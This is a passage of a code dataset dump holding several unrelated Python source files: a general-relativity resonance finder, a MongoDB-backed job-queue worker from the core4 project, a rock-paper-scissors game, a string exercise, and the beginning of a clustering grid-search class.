body's mass:\")\nmu_inner = 0.00001 #float(input())\nprint(\"Enter the perturber's mass:\")\nmu_outer = 0.00001 #float(input())\nprint(\"Enter the SMBH mass:\")\nM = 1 #float(input())\nprint(\"Enter the spin parameter:\")\nastar = 0.9 #float(input())\nprint(\"Enter the number of inner/outer body file pairs:\")\nfile_amount = 50 #float(input())\n\n\n\n#Starting the runs\nnumber = 0\nfor file_number in range(file_amount):\n\n #Importing all the info from the files. Feel free to change this depending on the files you made\n #Also note how we use label, because there will (very likely) always be less points in outer than inner.\n _, time_value_1, J_r_inner_list, J_theta_inner_list, J_phi_inner_list, om_inner_r_list, om_inner_theta_list, om_inner_phi_list, delta_t_list_inner = np.loadtxt(\"inner_body_runs/J_evolve_inner_\" + str(file_number+1) + \".txt\", unpack=True)\n label, time_value_2, J_r_outer_list, J_theta_outer_list, J_phi_outer_list, om_outer_r_list, om_outer_theta_list, om_outer_phi_list, delta_t_list_outer = np.loadtxt(\"outer_body_runs/J_evolv_outer_\" + str(file_number+1) + \".txt\", unpack=True) \n \n #Interpolation of J values\n J_inner_r_function = interpolate.interp1d(time_value_1, J_r_inner_list, kind='linear')\n J_inner_theta_function = interpolate.interp1d(time_value_1, J_theta_inner_list, kind='linear')\n J_inner_phi_function = interpolate.interp1d(time_value_1, J_phi_inner_list, kind='linear')\n J_outer_r_function = interpolate.interp1d(time_value_2, J_r_outer_list, kind='linear')\n J_outer_theta_function = interpolate.interp1d(time_value_2, J_theta_outer_list, kind='linear')\n J_outer_phi_function = interpolate.interp1d(time_value_2, J_phi_outer_list, kind='linear')\n\n #Interpolation of omega values\n om_inner_r_function = interpolate.interp1d(time_value_1, om_inner_r_list, kind='linear')\n om_inner_theta_function = interpolate.interp1d(time_value_1, om_inner_theta_list, kind='linear')\n om_inner_phi_function = interpolate.interp1d(time_value_1, om_inner_phi_list, kind='linear')\n om_outer_r_function = interpolate.interp1d(time_value_2, om_outer_r_list, kind='linear')\n om_outer_theta_function = interpolate.interp1d(time_value_2, om_outer_theta_list, kind='linear')\n om_outer_phi_function = interpolate.interp1d(time_value_2, om_outer_phi_list, kind='linear')\n\n #Setting up time axis. 
Note that since the inner body will (usually) run to less than the outer body, so we use its timescale.\n #Also, if any inner files goes to less than 100000, feel free to adjust this accordingly.\n t = np.linspace(1, time_value_1[-1], 100000)\n\n #Composing A values (which are)\n A_inner_r_list = []\n A_inner_theta_list = []\n A_outer_r_list = []\n A_outer_theta_list = []\n\n res_timing = []\n\n i = 0\n for i in range(len(t)):\n\n A_inner_r_list.append(om_inner_r_function(t[i])/(om_inner_phi_function(t[i])-om_outer_phi_function(t[i])))\n A_inner_theta_list.append(om_inner_theta_function(t[i])/(om_inner_phi_function(t[i])-om_outer_phi_function(t[i])))\n A_outer_r_list.append(om_outer_r_function(t[i])/(om_inner_phi_function(t[i])-om_outer_phi_function(t[i])))\n A_outer_theta_list.append(om_outer_theta_function(t[i])/(om_inner_phi_function(t[i])-om_outer_phi_function(t[i])))\n \n \n #Now we start the big check\n label.tolist()\n [int(num) for num in label]\n #Note (for the paper and in general) we chose to range between -5 and 5 bc anything greater, we found, was insignificant \n for n_inner in range(-5,5): \n for n_outer in range(-5,5):\n for k_inner in range(-5,5):\n for k_outer in range(-5,5):\n\n #Selection rule\n if abs(k_inner - k_outer) == 2:\n #Calculating potential m's\n m = []\n for j in range(len(A_inner_r_list)):\n m.append(-n_inner*A_inner_r_list[j]-k_inner*A_inner_theta_list[j]+n_outer*A_outer_r_list[j]+k_outer*A_outer_theta_list[j])\n\n #Finding where there is a resonance crossing\n for i in range(len(m)-1):\n if math.floor(m[i+1]) != math.floor(m[i]):\n if abs(m[i])<=2:\n if t[i] != 1.0:\n time_value_resonance = t[i]\n\n #Final calculation and print out\n for index in range(len(label)-1):\n if time_value_1[index] < time_value_resonance and time_value_1[index+1] > time_value_resonance:\n \n omega_inner_after = om_inner_r_list[index+1]*n_inner + om_inner_theta_list[index+1]*k_inner + om_inner_phi_list[index+1]*(math.floor(m[i+1]))\n omega_inner_before = om_inner_r_list[index]*n_inner + om_inner_theta_list[index]*k_inner + om_inner_phi_list[index]*(math.floor(m[i+1]))\n delta_t_inner = delta_t_list_inner[index+1]\n omega_inner_dot = (omega_inner_after-omega_inner_before)/delta_t_inner\n\n omega_outer_after = om_outer_r_list[index+1]*n_outer + om_outer_theta_list[index+1]*k_outer + om_outer_phi_list[index+1]*(math.floor(m[i+1]))\n omega_outer_before = om_outer_r_list[index]*n_outer + om_outer_theta_list[index]*k_outer + om_outer_phi_list[index]*(math.floor(m[i+1]))\n delta_t_outer = delta_t_list_outer[index+1]\n omega_outer_dot = (omega_outer_after-omega_outer_before)/delta_t_outer\n\n gamma = mu_inner*omega_inner_dot-mu_outer*omega_outer_dot\n\n J_inner = [J_inner_r_function(t[i]), J_inner_theta_function(t[i]), J_inner_phi_function(t[i])]\n J_outer = [J_outer_r_function(t[i]), J_outer_theta_function(t[i]), J_outer_phi_function(t[i])]\n\n _, EQL_outer = ckerr_j2eql(J_outer, M, astar)\n _, EQL_inner = ckerr_j2eql(J_inner, M, astar)\n\n _, _, anc_outer = ckerr_eql2j(list(EQL_outer), M, astar)\n _, _, anc_inner = ckerr_eql2j(list(EQL_inner), M, astar)\n\n number = number + 1\n\n print(number, file_number + 1, t[i], omega_inner_dot, omega_outer_dot, mu_inner, mu_outer, gamma, math.floor(m[i+1]), n_inner, k_inner, n_outer, k_outer, J_inner[0], J_inner[1], J_inner[2], J_outer[0], J_outer[1], J_outer[2], anc_inner[0], anc_inner[1], anc_inner[2], anc_outer[0], anc_outer[1], anc_outer[2])\n \n \n\n 
\n","repo_name":"hirata10/gr-resonance-tools","sub_path":"resfinder.py","file_name":"resfinder.py","file_ext":"py","file_size_in_byte":8126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1577997810","text":"import collections\nimport signal\nfrom datetime import timedelta\n\nimport psutil\nimport pymongo\n\nimport core4.queue.job\nimport core4.queue.process\nimport core4.queue.query\nimport core4.service.introspect.main\nimport core4.util.node\nfrom core4.queue.daemon import CoreDaemon\nfrom core4.service.introspect.command import EXECUTE\n\n#: processing steps in the main loop of :class:`.CoreWorker`\nSTEPS = (\n \"work_jobs\",\n \"remove_jobs\",\n \"flag_jobs\",\n \"collect_stats\")\n\n\nclass CoreWorker(CoreDaemon, core4.queue.query.QueryMixin):\n \"\"\"\n This class is the working horse to carry and execute jobs. Workers have an\n identifier. This identifier defaults to the hostname of the worker and must\n be unique across the cluster.\n \"\"\"\n kind = \"worker\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.offset = None\n self.steps = STEPS\n self.plan = self.create_plan()\n self.cycle.update(dict([(s, 0) for s in self.steps]))\n self.stats_collector = collections.deque(maxlen=\n round(\n self.config.worker.avg_stats_secs\n / self.config.worker.execution_plan.collect_stats))\n # populate with first resource-tuple.\n self.stats_collector.append(\n (min(psutil.cpu_percent(percpu=True)),\n psutil.virtual_memory()[4] / 2. ** 20))\n self.job = None\n self.handle_signal()\n\n def handle_signal(self):\n # ignore signal from children to avoid defunct zombies\n signal.signal(signal.SIGCHLD, signal.SIG_IGN)\n\n def startup(self):\n \"\"\"\n Implements the **startup** phase of the scheduler. The method is based\n on :class:`.CoreDaemon` implementation and additionally spawns\n :meth:`.collect_job`.\n \"\"\"\n super().startup()\n intro = core4.service.introspect.main.CoreIntrospector()\n self.job = intro.collect_job()\n\n def cleanup(self):\n \"\"\"\n General housekeeping method of the worker.\n \"\"\"\n ret = self.config.sys.lock.delete_many({\"owner\": self.identifier})\n self.logger.info(\n \"cleanup removed [%d] sys.lock records\", ret.raw_result[\"n\"])\n\n def create_plan(self):\n \"\"\"\n Creates the worker's execution plan in the main processing loop:\n\n #. :meth:`.work_jobs` - get next job, inactivate or execute\n #. :meth:`.remove_jobs` - remove jobs\n #. :meth:`.flag_jobs` - flag jobs as non-stoppers, zombies, killed\n #. 
:meth:`.collect_stats` - collect and save general server metrics\n\n        :return: dict with step ``name``, ``interval``, ``next`` timestamp\n                 to execute and method reference ``call``\n        \"\"\"\n        plan = []\n        now = core4.util.node.now()\n        for s in self.steps:\n            interval = self.config.worker.execution_plan[s]\n            if self.wait_time is None:\n                self.wait_time = interval\n            else:\n                self.wait_time = min(interval, self.wait_time)\n            self.logger.debug(\"set [%s] interval [%1.2f] sec.\", s, interval)\n            plan.append({\n                \"name\": s,\n                \"interval\": interval,\n                \"next\": now + timedelta(seconds=interval),\n                \"call\": getattr(self, s)\n            })\n        self.logger.debug(\n            \"create execution plan with cycle time [%1.2f] sec.\",\n            self.wait_time)\n        return plan\n\n    def run_step(self):\n        \"\"\"\n        This method implements the steps of the worker.\n        See :meth:`.create_plan` for further details.\n        \"\"\"\n        for step in self.plan:\n            interval = timedelta(seconds=step[\"interval\"])\n            if step[\"next\"] <= self.at:\n                self.logger.debug(\"enter [%s] at cycle [%s]\",\n                                  step[\"name\"], self.cycle[\"total\"])\n                step[\"call\"]()\n                self.logger.debug(\"exit [%s] at cycle [%s]\",\n                                  step[\"name\"], self.cycle[\"total\"])\n                step[\"next\"] = self.at + interval\n\n    def work_jobs(self):\n        \"\"\"\n        This method is part of the main\n        :meth:`loop <core4.queue.daemon.CoreDaemon.loop>` phase of the worker.\n\n        The step queries and handles the best next job from ``sys.queue`` (see\n        :meth:`.get_next_job` and :meth:`.start_job`). Furthermore this method\n        *inactivates* jobs.\n        \"\"\"\n        doc = self.get_next_job()\n        if doc is None:\n            return\n        if not self.inactivate(doc):\n            self.start_job(doc)\n\n    def inactivate(self, doc):\n        \"\"\"\n        This method is called by :meth:`.work_jobs` to mark jobs which have\n        reached ``inactive_at`` as ``inactive``.\n\n        :param doc: job document to inactivate\n        \"\"\"\n        if doc[\"state\"] == core4.queue.job.STATE_DEFERRED:\n            if doc.get(\"inactive_at\", None):\n                if doc[\"inactive_at\"] <= self.at:\n                    update = {\n                        \"state\": core4.queue.job.STATE_INACTIVE\n                    }\n                    ret = self.config.sys.queue.update_one(\n                        filter={\"_id\": doc[\"_id\"]}, update={\"$set\": update})\n                    if ret.raw_result[\"n\"] != 1:\n                        raise RuntimeError(\n                            \"failed to inactivate job [{}]\".format(doc[\"_id\"]))\n                    self.queue.unlock_job(doc[\"_id\"])\n                    self.queue.make_stat('inactivate_job', str(doc[\"_id\"]))\n                    self.logger.error(\"done execution with [inactive] - [%s] \"\n                                      \"with [%s]\", doc[\"name\"], doc[\"_id\"])\n                    return True\n        return False\n\n    def start_job(self, doc, run_async=True):\n        \"\"\"\n        This method is called by :meth:`.work_jobs` and encapsulated for\n        testing purposes only.\n\n        :param doc: job document to launch\n        :param run_async: run asynchronously (default) or wait for the\n                          process to complete\n        \"\"\"\n        now = self.at\n        update = {\n            \"state\": core4.queue.job.STATE_RUNNING,\n            \"started_at\": now,\n            \"query_at\": None,\n            \"trial\": doc[\"trial\"] + 1,\n            \"locked\": {\n                \"at\": now,\n                \"heartbeat\": now,\n                \"hostname\": core4.util.node.get_hostname(),\n                \"pid\": None,\n                \"worker\": self.identifier\n            }\n        }\n        ret = self.config.sys.queue.update_one(\n            filter={\"_id\": doc[\"_id\"]}, update={\"$set\": update})\n        if ret.raw_result[\"n\"] != 1:\n            raise RuntimeError(\n                \"failed to update job [{}] state [starting]\".format(\n                    doc[\"_id\"]))\n        self.queue.make_stat('request_start_job', str(doc[\"_id\"]))\n        self.logger.info(\"launching [%s] with _id [%s]\", doc[\"name\"],\n                         doc[\"_id\"])\n        if run_async:\n            core4.service.introspect.main.exec_project(\n                doc[\"name\"], EXECUTE, wait=False, job_id=str(doc[\"_id\"]))\n        
else:\n from core4.queue.process import CoreWorkerProcess\n CoreWorkerProcess().start(doc[\"_id\"], redirect=False, manual=True)\n\n def get_next_job(self):\n \"\"\"\n Queries the best next job from collection ``sys.queue``. This method\n filters and orders jobs with the following properties:\n\n **filter:**\n\n * not ``locked``\n * with ``attempts_left``\n * in waiting state (``pending``, ``failed`` or ``deferred``)\n * eligable for this or all worker (``.identifier``)\n * not removed, yet (``.removed_at``)\n * not killed, yet (``.killed_at``)\n * with no or past query time (``.query_at``)\n\n **sort order:**\n\n * ``.force``\n * ``.priority``\n * enqueue date/time (job ``.id`` sort order)\n\n The method memorises an ``offset`` attribute to ensure all jobs have a\n chance to get queries across multiple workers. If all jobs have been\n checked, then the offset is reset and querying starts from top.\n\n In order to handle high priority jobs, the existence of a job *below*\n the current offset is checked. If a job with a higher priority exists\n below the ``offset``, then this high-priority job is returned.\n\n :return: job document from collection ``sys.queue``\n \"\"\"\n query = [\n {'locked': None},\n {'attempts_left': {'$gt': 0}},\n {'$or': [\n {'state': s} for s in [\n core4.queue.job.STATE_PENDING,\n core4.queue.job.STATE_FAILED,\n core4.queue.job.STATE_DEFERRED]]\n },\n {'$or': [{'worker': self.identifier},\n {'worker': None}]},\n {'removed_at': None},\n {'killed_at': None},\n {'$or': [{'query_at': {'$lte': self.at}},\n {'query_at': None}]},\n ]\n order = [\n ('force', pymongo.DESCENDING),\n ('priority', pymongo.DESCENDING),\n ('_id', pymongo.ASCENDING)\n ]\n if self.offset:\n cur2 = self.config.sys.queue.find(\n filter={'$and': query + [{\"_id\": {\"$lte\": self.offset}}]},\n sort=order)\n query.append({'_id': {'$gt': self.offset}})\n else:\n cur2 = None\n cur1 = self.config.sys.queue.find(\n filter={'$and': query}, sort=order)\n while True:\n try:\n data = cur1.next()\n except StopIteration:\n data = None\n if cur2 is not None:\n try:\n data2 = cur2.next()\n except StopIteration:\n data2 = None\n else:\n data2 = None\n if data is None:\n if data2 is None:\n self.offset = None\n return None\n self.logger.debug(\n \"next job from top chunk [%s]\", data2[\"_id\"])\n data = data2\n else:\n self.logger.debug(\n \"next job from bottom chunk [%s]\", data[\"_id\"])\n if data2 is not None and data2[\"priority\"] > data[\"priority\"]:\n data = data2\n self.logger.debug(\n \"next job from prioritised top chunk [%s]\",\n data[\"_id\"])\n project = data[\"name\"].split(\".\")[0]\n if self.queue.maintenance(project):\n self.logger.debug(\n \"skipped job [%s] in maintenance\", data[\"_id\"])\n continue\n\n # check system resources\n cur_stats = self.avg_stats()\n if ((cur_stats[0] > self.config.worker.max_cpu)\n or (cur_stats[1] < self.config.worker.min_free_ram)):\n if not data[\"force\"]:\n self.logger.info(\n 'skipped job [%s] with _id [%s]: '\n 'not enough resources available: '\n 'cpu [%1.1f], memory [%1.1f]',\n data[\"name\"], data[\"_id\"], *cur_stats[:2])\n return None\n\n # check max_parallel\n count = self.config.sys.queue.count_documents(\n filter={'name': data[\"name\"],\n \"locked.worker\": self.identifier})\n if count >= data[\"max_parallel\"]:\n continue\n # acquire lock\n if not self.queue.lock_job(self.identifier, data[\"_id\"]):\n self.logger.debug('skipped job [%s] due to lock failure',\n data[\"_id\"])\n continue\n\n self.offset = data[\"_id\"]\n self.logger.debug('successfully 
reserved [%s]', data[\"_id\"])\n            return data\n\n    def remove_jobs(self):\n        \"\"\"\n        This method is part of the main\n        :meth:`loop <core4.queue.daemon.CoreDaemon.loop>` phase of the worker.\n\n        The processing step queries all jobs with a specified ``removed_at``\n        attribute. After successful job lock, the job is moved from\n        ``sys.queue`` into ``sys.journal``.\n\n        .. note:: This method does not unlock the job from ``sys.lock``. This\n                  special behavior is required to prevent race conditions\n                  between multiple workers simultaneously removing *and*\n                  locking the job between ``sys.queue`` and ``sys.lock``.\n        \"\"\"\n\n        cur = self.config.sys.queue.find(\n            {\"removed_at\": {\"$ne\": None}}\n        )\n        for doc in cur:\n            if self.queue.lock_job(self.identifier, doc[\"_id\"]):\n                if self.queue.journal(doc):\n                    ret = self.config.sys.queue.delete_one({\"_id\": doc[\"_id\"]})\n                    if ret.raw_result[\"n\"] != 1:\n                        raise RuntimeError(\n                            \"failed to remove job [{}]\".format(doc[\"_id\"]))\n                    self.queue.make_stat('remove_job', str(doc[\"_id\"]))\n                    self.logger.info(\n                        \"successfully journaled and removed job [%s]\",\n                        doc[\"_id\"])\n                    # note: we will not unlock the job to prevent race\n                    # conditions with other workers; this will be settled\n                    # with .cleanup\n                    continue\n                self.logger.error(\n                    \"failed to journal and remove job [%s]\", doc[\"_id\"])\n\n    def flag_jobs(self):\n        \"\"\"\n        This method is part of the main\n        :meth:`loop <core4.queue.daemon.CoreDaemon.loop>` phase of the worker.\n\n        The method queries all jobs in state ``running`` locked by the current\n        worker and forwards processing to\n\n        #. identify and flag non-stopping jobs (see :meth:`.flag_nonstop`),\n        #. identify and flag zombies (see :meth:`.flag_zombie`),\n        #. identify and handle died jobs (see :meth:`.check_pid`), and to\n        #. manage jobs requested to be killed (see :meth:`.kill_pid` and\n           :meth:`.check_kill`)\n        \"\"\"\n        cur = self.config.sys.queue.find(\n            {\n                \"state\": core4.queue.job.STATE_RUNNING,\n                \"locked.worker\": self.identifier\n            },\n            projection=[\n                \"_id\", \"wall_time\", \"wall_at\", \"zombie_time\", \"zombie_at\",\n                \"started_at\", \"locked.heartbeat\", \"locked.pid\", \"killed_at\",\n                \"name\"\n            ]\n        )\n        for doc in cur:\n            self.flag_nonstop(doc)\n            self.flag_zombie(doc)\n            self.check_pid(doc)\n            self.kill_pid(doc)\n        self.check_kill()\n\n    def check_kill(self):\n        \"\"\"\n        Identifies jobs requested to be killed while still in a waiting state\n        (``pending``, ``deferred`` or ``failed``).\n        \"\"\"\n        cur = self.config.sys.queue.find(\n            {\n                \"state\": {\"$in\": [\n                    core4.queue.job.STATE_PENDING,\n                    core4.queue.job.STATE_DEFERRED,\n                    core4.queue.job.STATE_FAILED\n                ]},\n                \"killed_at\": {\n                    \"$ne\": None\n                }\n            },\n            projection=[\n                \"_id\", \"wall_time\", \"wall_at\", \"zombie_time\", \"zombie_at\",\n                \"started_at\", \"locked.heartbeat\", \"locked.pid\", \"killed_at\",\n                \"name\"\n            ]\n        )\n        for doc in cur:\n            if self.queue.lock_job(self.identifier, doc[\"_id\"]):\n                self.kill_pid(doc)\n\n    
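The journal-then-delete ordering in remove_jobs only removes a job from the live queue after the journal write succeeds, guarded by a lock. A stand-alone sketch of that ordering with plain pymongo (collection names and lock scheme are illustrative, not core4's actual implementation):

from pymongo.errors import DuplicateKeyError

def archive_job(db, doc, owner):
    # _id is unique, so this insert is an atomic test-and-set lock
    try:
        db.lock.insert_one({"_id": doc["_id"], "owner": owner})
    except DuplicateKeyError:
        return False  # another worker holds the lock
    db.journal.insert_one(doc)                 # journal first ...
    db.queue.delete_one({"_id": doc["_id"]})   # ... then drop from the queue
    return True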
def flag_nonstop(self, doc):\n        \"\"\"\n        Identifies non-stopping jobs which exceeded their runtime beyond the\n        specified ``wall_at`` timestamp.\n\n        .. note:: The ``wall_at`` attribute represents the timestamp when\n                  the job was flagged. Job execution continues without further\n                  action.\n\n        :param doc: job MongoDB document\n        \"\"\"\n        if doc[\"wall_time\"] and not doc[\"wall_at\"]:\n            if doc[\"started_at\"] < (self.at\n                                    - timedelta(seconds=doc[\"wall_time\"])):\n                ret = self.config.sys.queue.update_one(\n                    filter={\n                        \"_id\": doc[\"_id\"]\n                    },\n                    update={\"$set\": {\"wall_at\": core4.util.node.mongo_now()}})\n                if ret.raw_result[\"n\"] == 1:\n                    self.logger.warning(\n                        \"successfully set non-stop job [%s]\", doc[\"_id\"])\n                    self.queue.make_stat('flag_nonstop', str(doc[\"_id\"]))\n\n    def flag_zombie(self, doc):\n        \"\"\"\n        Identifies zombie jobs which have not updated their ``heartbeat`` (in\n        the ``.locked`` attribute) for the date/time range specified in the\n        ``.zombie_time`` attribute.\n\n        The jobs' :meth:`.progress <core4.queue.job.CoreJob.progress>` method\n        updates the ``heartbeat``. Therefore job developers are expected to\n        call this method for long-running algorithms regularly.\n\n        .. note:: The ``zombie_at`` attribute represents the timestamp when\n                  the job was flagged. Job execution continues without further\n                  action.\n\n        :param doc: job MongoDB document\n        \"\"\"\n        if not doc[\"zombie_at\"]:\n            if doc[\"locked\"][\"heartbeat\"] < (self.at - timedelta(\n                    seconds=doc[\"zombie_time\"])):\n                ret = self.config.sys.queue.update_one(\n                    filter={\n                        \"_id\": doc[\"_id\"]\n                    },\n                    update={\n                        \"$set\": {\"zombie_at\": core4.util.node.mongo_now()}\n                    }\n                )\n                if ret.raw_result[\"n\"] == 1:\n                    self.logger.warning(\n                        \"successfully set zombie job [%s]\", doc[\"_id\"])\n                    self.queue.make_stat('flag_zombie', str(doc[\"_id\"]))\n\n    def check_pid(self, doc):\n        \"\"\"\n        Identifies and handles died jobs. If the job PID does not exist, the\n        job is flagged ``killed_at`` in ``sys.queue``.\n\n        :param doc: job MongoDB document\n        \"\"\"\n        if \"locked\" in doc and doc[\"locked\"][\"pid\"] is not None:\n            (found, _) = self.pid_exists(doc)\n            if not found:\n                self.logger.error(\"pid [%s] does not exist, killing\",\n                                  doc[\"locked\"][\"pid\"])\n                self.queue.exec_kill(doc)\n\n    def kill_pid(self, doc):\n        \"\"\"\n        Handles jobs which have been requested to be killed. If the process\n        exists, then it is killed and the job state is set to ``killed``.\n\n        :param doc: job MongoDB document\n        \"\"\"\n        if doc[\"killed_at\"]:\n            (found, proc) = self.pid_exists(doc)\n            if found and proc:\n                proc.kill()\n            self.queue.exec_kill(doc)\n\n    def pid_exists(self, doc):\n        \"\"\"\n        Returns ``True`` if the job process exists and its OS state is neither\n        *DEAD* nor *ZOMBIE*. The :class:`psutil.Process` object is also\n        returned for further action.\n\n        :param doc: job MongoDB document\n        :return: tuple of ``True`` or ``False`` and the job process or None\n        \"\"\"\n        proc = None\n        if \"locked\" in doc and doc[\"locked\"][\"pid\"] is not None:\n            if psutil.pid_exists(doc[\"locked\"][\"pid\"]):\n                proc = psutil.Process(doc[\"locked\"][\"pid\"])\n                if proc.status() not in (psutil.STATUS_DEAD,\n                                         psutil.STATUS_ZOMBIE):\n                    return True, proc\n        return False, proc\n\n    
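pid_exists() combines an existence check with a status check, because an exited process can linger as a zombie. The same probe in isolation (a sketch, not core4 API):

import psutil

def process_alive(pid):
    # pid_exists alone is not enough: a reaped-but-unwaited process
    # still shows up, so inspect the status as well
    if psutil.pid_exists(pid):
        proc = psutil.Process(pid)
        return proc.status() not in (psutil.STATUS_DEAD, psutil.STATUS_ZOMBIE)
    return False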
def collect_stats(self):\n        \"\"\"\n        Collects cpu and memory and inserts them as a tuple into\n        self.stats_collector. CPU is computed via\n        CPU-Utilization/(idle-time+io-wait); free RAM is in MB.\n        \"\"\"\n        # psutil already accounts for idle and io-wait (idle and waiting for\n        # IO), we are not interested in both.\n        self.stats_collector.append(\n            (min(psutil.cpu_percent(percpu=True)),\n             psutil.virtual_memory()[4] / 2. ** 20))\n\n    def avg_stats(self):\n        \"\"\"\n        :return: tuple of average cpu and memory over the time configured in\n                 config.worker.avg_stats_secs.\n        \"\"\"\n        cpu = sum(c for c, m in self.stats_collector)\n        mem = sum(m for c, m in self.stats_collector)\n        div = len(self.stats_collector)\n        return cpu / div, mem / div\n\nif __name__ == '__main__':\n    import core4.logger.mixin\n    core4.logger.mixin.logon()\n    w = CoreWorker()\n    print(\"start worker [%s]\" % (w.identifier))\n    w.start()\n","repo_name":"plan-net/core4","sub_path":"core4/queue/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":20834,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"35"} +{"seq_id":"24087137625","text":"# Rock Paper Scissors Game\n\nimport random\n\noptions = [\"Rock\", \"Paper\", \"Scissors\"]\nuser_options = [\"R\", \"r\", \"s\", \"S\", \"P\", \"p\"]\n\ndef welcome():\n    print('Welcome to Rock Paper Scissors')\n    print(\"Rock beats Scissors\\nPaper beats Rock\\nScissors beats Paper\")\n    print(\"R is for Rock\\nP is for Paper\\nS is for Scissors\")\n\ndef new_game(player, answer):\n    if player == answer:\n        print(\"Oops! It's a draw\")\n    elif player == \"Rock\" and answer == \"Scissors\":\n        print(\"Congratulations! You won. Rock crushes Scissors\")\n    elif player == \"Rock\" and answer == \"Paper\":\n        print(\"Sorry, you lost. Paper wraps Rock\")\n    elif player == \"Scissors\" and answer == \"Paper\":\n        print(\"Congratulations! You won. Scissors cuts Paper\")\n    elif player == \"Scissors\" and answer == \"Rock\":\n        print(\"Sorry, you lost. Rock crushes Scissors\")\n    elif player == \"Paper\" and answer == \"Rock\":\n        print(\"Congratulations! You won. Paper wraps Rock\")\n    elif player == \"Paper\" and answer == \"Scissors\":\n        print(\"Sorry, you lost. Scissors cuts Paper\")\n\n
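The chained comparisons in new_game can also be collapsed into a lookup table; a sketch of that alternative design (not part of the original game):

# each key beats its value
beats = {"Rock": "Scissors", "Paper": "Rock", "Scissors": "Paper"}

def outcome(player, answer):
    if player == answer:
        return "draw"
    return "win" if beats[player] == answer else "loss"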
is_running = True\nwhile is_running:\n    welcome()\n    answer = random.choice(options)\n    # User makes a selection\n    input_user = input(\"Please choose R, P, or S:\\n\")\n\n    # If conditions are met\n    if (input_user in user_options):\n        print(\"Great choice\")\n        if input_user == user_options[0] or input_user == user_options[1]:\n            player = options[0]\n        elif input_user == user_options[2] or input_user == user_options[3]:\n            player = options[2]\n        else:\n            player = options[1]\n        print(\"You have selected\", player)\n        new_game(player, answer)\n        print(f\"Computer chose {answer}\")\n    else:\n        print(\"Sorry, please select R, P or S\")\n\n    choice = input(\"Let's play again? Y/N: \")\n    if choice == \"N\":\n        is_running = False\nprint(\"See you again next time!\")\n","repo_name":"aearns/Zuri_Tasks","sub_path":"Tasks/Python/RockPaperScissors.py","file_name":"RockPaperScissors.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"8877310117","text":"#!/usr/bin/env python3\n\ntask = \"\"\"\nTask:\nWrite a Python program to check if every consecutive sequence of zeroes is followed by\na consecutive sequence of ones of same length in a given string. Return True/False.\n\"\"\"\n\nprint(task)\n\ndef seq_check(seq):\n    while '01' in seq:\n        seq = seq.replace('01', '')\n    return len(seq) == 0\n\nseq = [\"01010101\", \"00\", \"000111000111\", \"00011100011\"]\n\nfor i in seq: print( \"{:12} - {}\".format( i, seq_check(i) ) )","repo_name":"woodyart/py-excercises","sub_path":"basic-part-i/142.py","file_name":"142.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23862275264","text":"from joblib import Parallel, delayed\nfrom sklearn.model_selection import ParameterGrid\nfrom sklearn.base import clone\nimport pandas as pd\nfrom abc import ABCMeta, abstractmethod\nfrom time import time\n\nfrom sklearn.base import BaseEstimator, MetaEstimatorMixin\nfrom mvmm.clustering_measures import several_unsupervised_cluster_scores, \\\n    MEASURE_MIN_GOOD\n\n# TODO: add random seed\n\n\nclass BaseGridSearch(MetaEstimatorMixin, BaseEstimator, metaclass=ABCMeta):\n    def __init__(self,\n                 base_estimator,\n                 param_grid={},\n                 select_metric='bic',\n                 metrics2compute=['aic', 'bic'],\n                 n_jobs=None,\n                 backend=None,\n                 verbose=0,\n                 pre_dispatch='2*n_jobs'):\n\n        self.base_estimator = base_estimator\n        self.param_grid = param_grid\n        self.select_metric = select_metric\n        self.metrics2compute = metrics2compute\n        self.n_jobs = n_jobs\n        self.backend = backend\n        self.verbose = verbose\n        self.pre_dispatch = pre_dispatch\n\n    @abstractmethod\n    def fit_and_score(self, estimator, X, parameters, return_estimator=True):\n        \"\"\"\n        Fits an estimator on a dataset and scores the results.\n\n        Output\n        ------\n        scores, metadata, estimator\n        \"\"\"\n        pass\n\n    @property\n    def param_grid_(self):\n        \"\"\"\n        List of all parameter settings\n        \"\"\"\n        return list(ParameterGrid(self.param_grid))\n\n    def fit(self, X):\n\n        if self.verbose >= 1:\n            print(\"Fitting {} candidates\".format(len(self.param_grid_)))\n\n        start_time = time()\n        if self.n_jobs is not None:\n            parallel = Parallel(n_jobs=self.n_jobs,\n                                backend=self.backend,\n                                verbose=self.verbose,\n                                pre_dispatch=self.pre_dispatch)\n\n            with parallel:\n\n                results = \\\n                    parallel(delayed(self.fit_and_score)\n                             (clone(self.base_estimator), X=X,\n                              parameters=params)\n                             for params in self.param_grid_)\n        else:\n            results = [self.fit_and_score(clone(self.base_estimator),\n                                          X=X, parameters=params)\n                       for params in self.param_grid_]\n\n        self.metadata_ = {'fits': [res[1] for res in results],\n                          'fit_time': time() - start_time}\n\n        self.estimators_ = [res[2] for res in results]\n\n        self.model_sel_scores_ = \\\n            several_unsupervised_cluster_scores(X=X,\n                                                estimators=self.estimators_,\n                                                measures=self.metrics2compute)\n\n        return self\n\n    def check_fit(self):\n        return hasattr(self, 'estimators_')\n\n    
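fit() fans each parameter setting out through joblib; the core dispatch pattern reduced to a runnable sketch (the evaluate function is a toy stand-in for cloning and fitting an estimator):

from joblib import Parallel, delayed
from sklearn.model_selection import ParameterGrid

grid = list(ParameterGrid({"n_components": [2, 3],
                           "covariance_type": ["full", "diag"]}))

def evaluate(params):
    # stand-in for clone(base_estimator).fit(X); just echoes its setting
    return params

results = Parallel(n_jobs=2)(delayed(evaluate)(params) for params in grid)
print(len(results))  # one result per parameter setting, in grid order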
